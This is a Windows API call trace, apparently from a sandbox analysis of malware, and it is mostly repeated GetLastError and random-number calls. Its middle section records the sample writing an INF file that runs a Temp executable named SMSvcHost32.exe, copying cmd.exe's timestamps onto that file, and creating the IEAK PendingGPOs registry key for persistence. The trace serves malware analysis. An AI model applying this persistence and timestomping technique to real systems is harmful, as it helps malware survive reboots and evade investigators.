	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.395] GetLastError () returned 0x57
	[0075.396] GetLastError () returned 0x57
	[0075.396] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.396] GetLastError () returned 0x57
	[0075.396] GetLastError () returned 0x57
	[0075.396] GetLastError () returned 0x57
	[0075.396] GetLastError () returned 0x57
	[0075.396] GetLastError () returned 0x57
	[0075.396] GetLastError () returned 0x57
	[0075.396] GetLastError () returned 0x57
	[0075.396] GetLastError () returned 0x57
	[0075.396] GetLastError () returned 0x57
	[0075.396] GetLastError () returned 0x57
	[0075.396] GetLastError () returned 0x57
	[0075.396] GetLastError () returned 0x57
	[0075.396] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.396] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.396] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.396] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.396] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.397] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.397] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.397] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.397] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.397] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.397] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.397] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.398] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.398] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.398] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.398] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.398] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.398] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.398] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.398] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.399] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.399] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.399] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.399] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.399] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.399] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.399] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.400] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.400] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.400] wsprintfW (in: param_1=0x772730, param_2="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = %s:2\r\n\r\n[%s]\r\n%s\r\n" | out: param_1="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = kfuuguvzbyntqggikosizmrivmncdiejgtkhkxqblaiacvr:2\r\n\r\n[kfuuguvzbyntqggikosizmrivmncdiejgtkhkxqblaiacvr]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n") returned 296
	[0075.400] lstrlenW (lpString="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = kfuuguvzbyntqggikosizmrivmncdiejgtkhkxqblaiacvr:2\r\n\r\n[kfuuguvzbyntqggikosizmrivmncdiejgtkhkxqblaiacvr]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n") returned 296
	[0075.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = kfuuguvzbyntqggikosizmrivmncdiejgtkhkxqblaiacvr:2\r\n\r\n[kfuuguvzbyntqggikosizmrivmncdiejgtkhkxqblaiacvr]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n", cchWideChar=-1, lpMultiByteStr=0x7729a0, cbMultiByte=594, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[Version]\r\nsignature = \"$CHICAGO$\"\r\nAdvancedINF = 2.5, \"You need a new version of advpack.dll\"\r\n\r\n[DefaultInstall]\r\nRunPreSetupCommands = kfuuguvzbyntqggikosizmrivmncdiejgtkhkxqblaiacvr:2\r\n\r\n[kfuuguvzbyntqggikosizmrivmncdiejgtkhkxqblaiacvr]\r\nC:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\r\n", lpUsedDefaultChar=0x0) returned 297
	[0075.400] StrDupW (lpSrch="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe"
	[0075.400] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x35
	[0075.400] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf", lpDst=0x719468, nSize=0x35 | out: lpDst="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf") returned 0x35
	[0075.400] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.inf" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224
	[0075.402] GetSystemTime (in: lpSystemTime=0x292fe54 | out: lpSystemTime=0x292fe54*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0xd, wHour=0xe, wMinute=0x1, wSecond=0x27, wMilliseconds=0x282)) 
	[0075.402] SystemTimeToFileTime (in: lpSystemTime=0x292fe54, lpFileTime=0x292fe98 | out: lpFileTime=0x292fe98) returned 1
	[0075.402] SystemTimeToFileTime (in: lpSystemTime=0x292fe54, lpFileTime=0x292fea0 | out: lpFileTime=0x292fea0) returned 1
	[0075.402] SystemTimeToFileTime (in: lpSystemTime=0x292fe54, lpFileTime=0x292fea8 | out: lpFileTime=0x292fea8) returned 1
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.402] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.403] GetLastError () returned 0x0
	[0075.404] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\system32\\cmd.exe", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x1c
	[0075.404] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\system32\\cmd.exe", lpDst=0x7226e0, nSize=0x1c | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c
	[0075.404] CreateFileW (lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220
	[0075.404] GetFileTime (in: hFile=0x7226e0, lpCreationTime=0x292fe98, lpLastAccessTime=0x292fea0, lpLastWriteTime=0x292fea8 | out: lpCreationTime=0x292fe98*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2), lpLastAccessTime=0x292fea0*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2), lpLastWriteTime=0x292fea8*(dwLowDateTime=0x4d290c80, dwHighDateTime=0x1d2e1e2)) returned 0
	[0075.404] SystemTimeToFileTime (in: lpSystemTime=0x292fe54, lpFileTime=0x292fe98 | out: lpFileTime=0x292fe98) returned 1
	[0075.404] SystemTimeToFileTime (in: lpSystemTime=0x292fe54, lpFileTime=0x292fea0 | out: lpFileTime=0x292fea0) returned 1
	[0075.404] SystemTimeToFileTime (in: lpSystemTime=0x292fe54, lpFileTime=0x292fea8 | out: lpFileTime=0x292fea8) returned 1
	[0075.404] CloseHandle (hObject=0x220) returned 1
	[0075.404] WriteFile (in: hFile=0x224, lpBuffer=0x7729a0*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x292feb0, lpOverlapped=0x0 | out: lpBuffer=0x7729a0*, lpNumberOfBytesWritten=0x292feb0*=0x128, lpOverlapped=0x0) returned 1
	[0075.405] SetEndOfFile (hFile=0x224) returned 1
	[0075.405] SetFileTime (hFile=0x224, lpCreationTime=0x292fe98, lpLastAccessTime=0x292fea0, lpLastWriteTime=0x292fea8) returned 1
	[0075.405] FlushFileBuffers (hFile=0x224) returned 1
	[0075.407] CloseHandle (hObject=0x224) returned 1
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.409] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.410] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.411] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.412] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] GetLastError () returned 0x6
	[0075.413] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf023f, lpSecurityAttributes=0x0, phkResult=0x292fd8c, lpdwDisposition=0x0 | out: phkResult=0x292fd8c*=0x224, lpdwDisposition=0x0) returned 0x0
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
	[0075.415] GetLastError () returned 0x6
